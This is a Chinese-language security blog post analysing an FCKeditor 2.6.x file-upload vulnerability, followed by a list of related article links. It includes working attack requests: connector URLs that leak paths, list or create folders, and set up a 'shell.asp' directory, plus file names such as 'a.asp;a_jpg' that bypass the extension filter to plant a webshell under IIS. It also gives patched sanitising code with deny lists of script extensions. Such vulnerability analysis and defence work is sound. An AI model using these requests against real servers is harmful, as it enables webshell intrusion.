Fckeditor PHP/ASP File Upload Vul

Andrew.Hann發表於2015-03-09

1. 漏洞描述
2. 漏洞觸發條件
3. 漏洞影響範圍
4. 漏洞程式碼分析
5. 防禦方法
6. 攻防思考

1. 漏洞描述

FCKeditor是目前最優秀的可見即可得網頁編輯器之一，它採用JavaScript編寫。具備功能強大、配置容易、跨瀏覽器、支援多種程式語言、開源等特點。它非常流行，網際網路上很容易找到相關技術文件，國內許多WEB專案和大型網站均採用了FCKeditor
它可和PHP、JavaScript、ASP、ASP.NET、ColdFusion、Java、以及ABAP等不同的程式語言相結合
FCK中一個很重要的檔案上傳的功能，常常被黑客用來進行GETSHELL攻擊，根本原因是因為角色許可權控制不嚴、以及副檔名限制邏輯存在BYPASS缺陷

Relevant Link:

http://sebug.net/vuldb/ssvid-20830

2. 漏洞觸發條件

0x1: 資訊蒐集

首先收集FCK的版本資訊

http://localhost/fckeditor/editor/dialog/fck_about.html
/*
version 
2.6.8
Build 25427
*/

0x2: 獲取上傳點路徑

爆物理路徑
http://172.31.200.74/editor/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

1. 爆路徑漏洞
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

2. 列目錄漏洞也可助找上傳地址
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp

http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

3. 其他上傳地址
http://192.168.174.138/fckeditor/_samples/default.html
http://192.168.174.138/fckeditor/_samples/asp/sample01.asp
http://192.168.174.138/fckeditor/_samples/asp/sample02.asp
http://192.168.174.138/fckeditor/_samples/asp/sample03.asp
http://192.168.174.138/fckeditor/_samples/asp/sample04.asp
一般很多站點都已刪除_samples目錄，可以試試。
FCKeditor/editor/fckeditor.html 不可以上傳檔案，可以點選上傳圖片按鈕再選擇瀏覽伺服器即可跳轉至可上傳檔案頁
http://192.168.174.138/fckeditor/editor/fckeditor.html

4. 常用上傳地址
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php  

5. FCKeditor 中test 檔案的上傳地址
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/test.html
http://192.168.174.138/fckeditor/editor/filemanager/upload/test.html
http://192.168.174.138/fckeditor/editor/filemanager/connectors/test.html
http://192.168.174.138/fckeditor/editor/filemanager/connectors/uploadtest.html

最終獲得的上傳點如下

http://localhost/fckeditor/editor/filemanager/connectors/test.html
http://localhost/fckeditor/editor/filemanager/connectors/uploadtest.html

0x3: 建立新資料夾

http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
//在images資料夾下建立資料夾

0x4: IIS解析漏洞

如果你的檔案處在一個xx.asp資料夾下，那這個資料夾下的所有檔案都會被當作.asp指令碼來執行，這是利用了IIS的xx.asp資料夾解析漏洞

1. 建立一個資料夾/z/shell.asp
http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684 
http://localhost/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

2. 上傳一個內容為WEBSHELL的xx.jpg檔案
http://localhost/userfiles/image/shell.asp/z/choop.jpg
http://localhost/userfiles/image/shell.asp/z/choop.jpg
//這個xx.jpg會被當作webshell解析

0x5: FCK副檔名過濾防禦解析漏洞

正常情況下，fck對上傳的檔案字尾副檔名是有防禦邏輯的(即禁止上傳指令碼檔案)

1. 上傳檔名: shell.php;.jpg
檔案會被重新命名為: shell_php.jpg

2. 如果上傳檔名: 
    1) a.php;a_jpg
    2) a.asp;a_jpg
則檔案不會被重新命名
 
3. 又因為IIS存在一個解析漏洞，分號";"後面的字串會被IIS截斷，導致黑客上傳的檔案對IIS來說就是
a.php
a.asp
從而得到執行

Relevant Link:

http://hi.baidu.com/holyli/item/f2d37959513ed509e6c4a597

3. 漏洞影響範圍

2.6.xx

4. 漏洞程式碼分析

FCKEditor上傳檢測，是通過黑色單/白名單的方式檢測允許和不允許上傳的檔案型別，具體的實現邏輯位於

1. asp: \editor\filemanager\connectors\asp\io.asp
2. php: \editor\filemanager\connectors\php\io.php
//在另一個browser目錄中也存在同樣目錄結構的一套檔案
3. asp: \editor\filemanager\browser\default\connectors\asp\io.asp
4. php: \editor\filemanager\browser\default\connectors\php\io.php

0x1: ASP

\fckeditor\editor\filemanager\connectors\asp\class_upload.asp

Private Function IsAllowed(sExt)
        Dim oRE
        Set oRE    = New RegExp
        oRE.IgnoreCase    = True
        oRE.Global        = True

        If sDenied = "" Then
            oRE.Pattern    = sAllowed
            IsAllowed    = (sAllowed = "") Or oRE.Test(sExt)
        Else
            oRE.Pattern    = sDenied
            IsAllowed    = Not oRE.Test(sExt)
        End If

        Set oRE    = Nothing
End Function

\fckeditor\editor\filemanager\connectors\asp\io.asp

Function IsAllowedExt( extension, resourceType )
    Dim oRE
    Set oRE    = New RegExp
    oRE.IgnoreCase    = True
    oRE.Global        = True

    Dim sAllowed, sDenied
    sAllowed    = ConfigAllowedExtensions.Item( resourceType )
    sDenied        = ConfigDeniedExtensions.Item( resourceType )

    IsAllowedExt = True

    If sDenied <> "" Then
        oRE.Pattern    = sDenied
        IsAllowedExt    = Not oRE.Test( extension )
    End If

    If IsAllowedExt And sAllowed <> "" Then
        oRE.Pattern        = sAllowed
        IsAllowedExt    = oRE.Test( extension )
    End If

    Set oRE    = Nothing
End Function

待檢測的extension是來自FCK的配置檔案:config.asp
\fckeditor\editor\filemanager\connectors\asp\config.asp

ConfigAllowedExtensions.Add    "File", "7z|aiff|asf|avi|bmp|csv|doc|fla|flv|gif|gz|gzip|jpeg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|ods|odt|pdf|png|ppt|pxd|qt|ram|rar|rm|rmi|rmvb|rtf|sdc|sitd|swf|sxc|sxw|tar|tgz|tif|tiff|txt|vsd|wav|wma|wmv|xls|xml|zip"

ConfigAllowedExtensions.Add    "Image", "bmp|gif|jpeg|jpg|png"

ConfigAllowedExtensions.Add    "Flash", "swf|flv"

ConfigAllowedExtensions.Add    "Media", "aiff|asf|avi|bmp|fla|flv|gif|jpeg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|png|qt|ram|rm|rmi|rmvb|swf|tif|tiff|wav|wma|wmv"

這只是提供給FCK的正則判斷邏輯，真正的重新命名機制在這裡
\fckeditor\editor\filemanager\connectors\asp\io.asp

' Do a cleanup of the file name to avoid possible problems
function SanitizeFileName( sNewFileName )
    Dim oRegex
    Set oRegex = New RegExp
    oRegex.Global        = True

    if ( ConfigForceSingleExtension = True ) then
        /*
        這就是重新命名檔名的關鍵邏輯了
        從第一個遇到"."號開始搜尋，並把後面的內容當作捕獲分組，捕獲分組的過濾條件是不會再在後面遇到一個"."號 了，並設定一個斷言，斷言的內容為捕獲分組的內容不可能發生，即如果還在後面遇到了一個"."號，則這個正則判斷成立，即搜尋到第一次遇到的"."號。然後進行replace操作，把"."號替換成"_"
        1. 如果我們的檔名是: asp.asp;asp.jpg，自然會被正則捕獲到，第一個"."號就被替換成了"_"
        2. 如果我們的檔名是: asp.asp;jpg，這種檔名也能通過檔案字尾判斷邏輯，即bypass
        */
        oRegex.Pattern = "\.(?![^.]*$)"
        sNewFileName = oRegex.Replace( sNewFileName, "_" )
    end if

' remove \ / | : ? *  " < > and control characters
    oRegex.Pattern = "(\\|\/|\||:|\?|\*|""|\<|\>|[\u0000-\u001F]|\u007F)"
    SanitizeFileName = oRegex.Replace( sNewFileName, "_" )

    Set oRegex = Nothing
end function

5. 防禦方法

1. ASP

0x1: 刪除fckeditor下含test的html檔案

1. \editor\filemanager\connectors\test.html

0x2: 在程式碼層防禦IIS解析漏洞(分號截斷)

\editor\filemanager\connectors\asp\io.asp

' Do a cleanup of the file name to avoid possible problems
function SanitizeFileName( sNewFileName )
    Dim oRegex
    Dim oRegexSecurityExt
    Set oRegex                 = New RegExp
    Set oRegexSecurityExt     = New RegExp
    oRegex.Global                    = True
    oRegexSecurityExt.Global        = True

    if ( ConfigForceSingleExtension = True ) then
        oRegex.Pattern = "\.(?![^.]*$)"
        SanitizeFileName = oRegex.Replace( sNewFileName, "_" )

        oRegexSecurityExt.Pattern = "\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)(;|$)"
        SanitizeFileName = oRegexSecurityExt.Replace( sNewFileName, "_" )
    end if

' remove \ / | : ? *  " < > and control characters
    oRegex.Pattern = "(\\|\/|\||:|\;|\?|\*|""|\<|\>|[\u0000-\u001F]|\u007F)"
    SanitizeFileName = oRegex.Replace( sNewFileName, "_" )

    Set oRegex = Nothing
end function

0x3: 在程式碼層防禦IIS解析漏洞(建立xx.asp目錄)
如果黑客通過FCK的目錄建立介面建立了一個xx.asp目錄，IIS將此目錄下的的任意檔案都當作asp指令碼進行解析，攻擊者可以向這個目錄下上傳包含WEBSHELL的jpg檔案

' Do a cleanup of the folder name to avoid possible problems
function SanitizeFolderName( sNewFolderName )
    Dim oRegex
    Dim oRegexSecurityExt
    Set oRegex                 = New RegExp
    Set oRegexSecurityExt     = New RegExp
    oRegex.Global                    = True
    oRegexSecurityExt.Global        = True

    'remove . \ / | : ? *  " < > and control characters
    oRegex.Pattern = "(\.|\\|\/|\||:|\?|\;|\*|""|\<|\>|[\u0000-\u001F]|\u007F)"
    SanitizeFolderName = oRegex.Replace( sNewFolderName, "_" )

    'forbidden the dangerous ext
    oRegexSecurityExt.Pattern = "\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)$"
    SanitizeFolderName = oRegexSecurityExt.Replace( sNewFolderName, "_" )

    Set oRegex = Nothing
end function

0x4: 副檔名上傳限制正則繞過漏洞

和0x2: 在程式碼層防禦IIS解析漏洞(分號截斷)相同，同時還可以通過強化正則規則，在副檔名的頭尾加上"起始"、"結束"定界符來規避攻擊者的畸形字尾bypass

Function IsAllowedType( resourceType )
    Dim oRE
    Set oRE    = New RegExp
    oRE.IgnoreCase    = False
    oRE.Global        = True
    oRE.Pattern        = "^(" & ConfigAllowedTypes & ")$"

    IsAllowedType = oRE.Test( resourceType )

    Set oRE    = Nothing
End Function

Function IsAllowedCommand( sCommand )
    Dim oRE
    Set oRE    = New RegExp
    oRE.IgnoreCase    = True
    oRE.Global        = True
    oRE.Pattern        = "^(" & ConfigAllowedCommands & ")$"

    IsAllowedCommand = oRE.Test( sCommand )

    Set oRE    = Nothing
End Function

Relevant Link:

http://www.chinaz.com/news/2012/1205/284700.shtml
http://www.sdlunzhong.cn/itres/showitnews.aspx?id=807

2. PHP

存在IIS+FastCGI即同時存在ASP、PHP的執行環境

/editor/filemanager/connectors/php/io.php

// Do a cleanup of the folder name to avoid possible problems
function SanitizeFolderName( $sNewFolderName )
{
    $sNewFolderName = stripslashes( $sNewFolderName ) ;

    // Remove . \ / | : ; . ? * " < >
    $sNewFolderName = preg_replace( '/\\.|\\\\|\\;|\\/|\\||\\:|\\?|\\*|"|<|>|[[:cntrl:]]/', '_', $sNewFolderName ) ;

    $sNewFolderName = preg_replace( '/\\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)$/i', '_', $sNewFolderName ) ;

    return $sNewFolderName ;
}

// Do a cleanup of the file name to avoid possible problems
function SanitizeFileName( $sNewFileName )
{
    global $Config ;

    $sNewFileName = stripslashes( $sNewFileName ) ;

    // Replace dots in the name with underscores (only one dot can be there... security issue).
    if ( $Config['ForceSingleExtension'] )
        $sNewFileName = preg_replace( '/\\.(?![^.]*$)/', '_', $sNewFileName ) ;

    // Remove \ / | : ? * " < >
    $sNewFileName = preg_replace( '/\\\\|\\/|\\||\\:|\\;|\\?|\\*|"|<|>|[[:cntrl:]]/', '_', $sNewFileName ) ;

    $sNewFileName = preg_replace( '/\\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)(;|$)/i', '_', $sNewFileName ) ;

    return $sNewFileName ;
}

6. 攻防思考

FIneCMS /dayrui/libraries/Chart/ofc_upload_image.php Arbitrary File Upload Vul
2015-08-14
UIPHP
qibocms /hr/listperson.php File Arbitrarily Include Vul Via Variable Uninitialization && Front Page Upload WEBSHELL
2015-08-05
PHPWebshell
wordpress /wp-content/plugins/wp-symposium/server/php/UploadHandler.php File Arbitrary Upload Vul
2015-09-14
PluginServerPHP
PHP FastCGI RCE Vul
2015-06-08
PHPAST
FCKeditor 上傳ftp asp.net
2011-11-21
FTPASP.NET
File upload by JSP (轉)
2007-12-11
JS
phpweb /version.php Vul
2015-09-09
PHPWeb
asp.net文字編輯器（FCKeditor）
2010-04-15
ASP.NET
ASP.NET中配置FCKeditor2.63
2009-10-28
ASP.NET
html 5 drag and drop upload file
2014-07-17
HTML
php 3個多檔案上傳(uploadify、file upload、 webuploader)
2017-01-17
PHPWeb
dedecms /install/index.php.bak Installation File Not Deleted && Executed Via Apache Analytic Vul
2015-05-15
IndexPHPdeleteApache
ecshop /flow.php SQL Injection Vul
2015-05-23
PHPSQL
ecshop /search.php SQL Injection Vul
2015-05-23
PHPSQL
ecshop /category.php SQL Injection Vul
2015-05-23
GoPHPSQL
discuz /faq.php SQL Injection Vul
2015-05-23
PHPSQL
ecshop /goods.php SQL Injection Vul
2016-01-15
GoPHPSQL
Upload excel file 到 INTERNAL TABLE 的方法
2007-07-23
Excel
dedecms /member/pm.php SQL Injection Vul
2015-05-21
PHPSQL
dedecms /plus/feedback.php SQL Injection Vul
2015-05-16
PHPSQL
Salesforce LWC學習(二十七) File Upload
2020-09-29
Salesforce
dedecms /member/myfriend_group.php SQL Injection Vul
2015-05-21
PHPSQL
dedecms /member/reg_new.php SQL Injection Vul
2015-05-21
PHPSQL
dedecms /member/edit_baseinfo.php SQL Injection Vul
2015-05-19
PHPSQL
phpcms /api/phpsso.php SQL Injection Vul
2016-02-23
PHPAPISQL
angular-file-upload 在IE下使用的坑
2018-09-26
Angular
dedecms /member/uploads_edit.php SQL Injection Vul
2015-05-21
PHPSQL
ecshop /includes/modules/payment/alipay.php SQL Injection Vul
2015-05-23
PHPSQL
ecshop /includes/init.php Arbitrary User Login Vul
2015-05-23
PHP
dedecms /include/helpers/archive.helper.php SQL Injection Vul
2015-05-19
HivePHPSQL
dedecms /member/flink_main.php SQL Injection Vul
2015-05-19
AIPHPSQL
ECMall /app/buyer_groupbuy.app.php SQL Injection Vul
2015-08-14
APPPHPSQL
上傳報錯：Upload Failed: Your upload has failed a virus scan. Please choose another file.
2024-08-13
AI
實用且常用的FN:Upload Excel File Into Internal Table
2007-11-01
Excel
dedecms \plus\guestbook.php SQL Injection Vul By \plus\guestbook\edit.inc.php
2015-05-22
PHPSQL
el-upload拍照上傳多個檔案報錯 ERR_UPLOAD_FILE_CHANGED問題
2024-06-13
ASP.NET MVC實踐系列11-FCKEditor和CKEditor的使用
2009-11-27
ASP.NETMVC
dedecms /member/buy_action.php Weak Password Vulnerability Algorithm Vul
2015-05-19
PHPGo

Fckeditor PHP/ASP File Upload Vul

相關文章